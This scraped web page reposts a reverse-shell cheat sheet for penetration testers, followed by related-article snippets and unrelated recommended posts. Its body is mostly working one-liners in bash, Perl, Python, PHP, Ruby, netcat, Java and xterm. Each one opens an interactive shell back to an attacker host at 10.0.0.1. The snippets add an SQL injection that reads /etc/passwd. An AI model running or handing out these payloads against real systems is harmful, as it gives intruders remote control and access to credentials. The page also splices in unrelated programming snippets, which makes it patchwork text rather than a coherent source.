反弹SHELL汇总
Reverse Shell Cheat Sheet
If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former.
Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.
The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.
Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.
Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
PERL
Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
There’s also an alternative PERL revere shell here.
Python
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.0.0.1 1234
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
[Untested submission from anonymous reader]
xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip
Further Reading
Also check out Bernardo’s Reverse Shell One-Liners. He has some alternative approaches and doesn’t rely on /bin/sh for his Ruby reverse shell.
There’s a reverse shell written in gawk over here. Gawk is not something that I’ve ever used myself. However, it seems to get installed by default quite often, so is exactly the sort of language pentesters might want to use for reverse shells.
Tags: bash, cheatsheet, netcat, pentest, perl, php, python, reverseshell, ruby, xterm
Posted in Shells
反弹SHELL汇总的更多相关文章
- Linux下反弹shell的种种方式
[前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考] 0x01 Bash bash -i >& /dev/tcp/ >& 这里s ...
- 内网渗透中的反弹Shell与端口转发
from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload ...
- NC / Netcat - 反弹Shell
原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>n ...
- 小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell
SQL手工注入 1.读取文件[load_file函数] ' union SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' unio ...
- linux反弹shell
参考链接 http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html http://www.waitalone.cn/linux-s ...
- python shell与反弹shell
python shell与反弹shell 正常shell需要先在攻击端开机情况下开启程序,然后攻击端运行程序,才能连接 反弹shell,攻击端是服务端,被攻击端是客户端正常shell,攻击端是客户端, ...
- linux下反弹shell
01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波. 02 环境 win10 192.168.43.151 监听端 装有nc kali ...
- golang写的反弹shell(自作孽不可活,切记,切记!)
仅作安全研究 package main import ( "os/exec" "go-pop3" "log" "strings&q ...
- 使用DnsCat反弹shell
DnsCat技术特点 Dns隧道反弹shell DnsCat服务器的安装 #git clone https://github.com/iagox86/dnscat2.git #cd dnscat2 # ...
随机推荐
- ASP.NET MVC API 路由生成规则
我们都知道调用ASP.NET MVC的某些API函数(诸如:Url.Action.RedirectToAction等)可以生成URL,ASP.NET MVC会根据调用API函数时传入的参数去匹配系统定 ...
- Jsoup的demao
package com.ch.jsoupdemo; import java.io.IOException; import org.jsoup.Jsoup;import org.jsoup.nodes. ...
- ILOG的一个基本应用——解决运输问题、转运问题
一.Ilog软件 该软件用来解决优化问题,大部分是线性问题,深一点的其他内容还不清楚.只知道一些基础的应用,网上相关内容很少.接下来就解决一个简单的运输问题 二.运输问题 数学模型 ILOG OPL程 ...
- 【python cookbook】【数据结构与算法】10.从序列中移除重复项且保持元素间顺序不变
问题:从序列中移除重复的元素,但仍然保持剩下的元素顺序不变 解决方案: 1.如果序列中的值时可哈希(hashable)的,可以通过使用集合和生成器解决.
- 161027、Java 中的 12 大要素及其他因素
对于许多人来说,"原生云"和"应用程序的12要素"是同义词.本文的目的是说有很多的原生云只坚持了最初的12个因素.在大多数情况下,Java 能胜任这一任务.在本 ...
- 2015.01.15(android AsyncTask)
参考网址:http://www.cnblogs.com/devinzhang/archive/2012/02/13/2350070.html /* * Params 启动任务执行的输入参数,比如HTT ...
- PHP用正则批量替换Img中src内容,用正则表达式获取图片路径实现缩略图功能
PHP用正则批量替换Img中src内容,用正则表达式获取图片路径实现缩略图功能 网上很多正则表达式只能获取或者替换一个img的src内容,或者只能替换固定的字符串,要动态替换多个图片内容的试了几个小时 ...
- plsql登录弹白框
环境:使用免安装版plsql,装有oracle服务端,plsql内有内置的oracle客户端,且tns配置正确. 问题:plsql登录弹白框 解决: 1.将oracle服务端的tns配置成与plsql ...
- 9、Http回顾/Servlet
1 Http回顾 Http协议: 1)http协议: 对浏览器客户端和服务器端之间数据传输的格式规范. 2)http请求:浏览器->服务器端 格式: 请求行(请求方式(GET/POST) 请求资 ...
- C#:序列化值与解码二进制
1.将对象序列化为二进制值,供WebBrowser传值: private static byte[] PostDataToBytes(Data postData) { JavaScriptSerial ...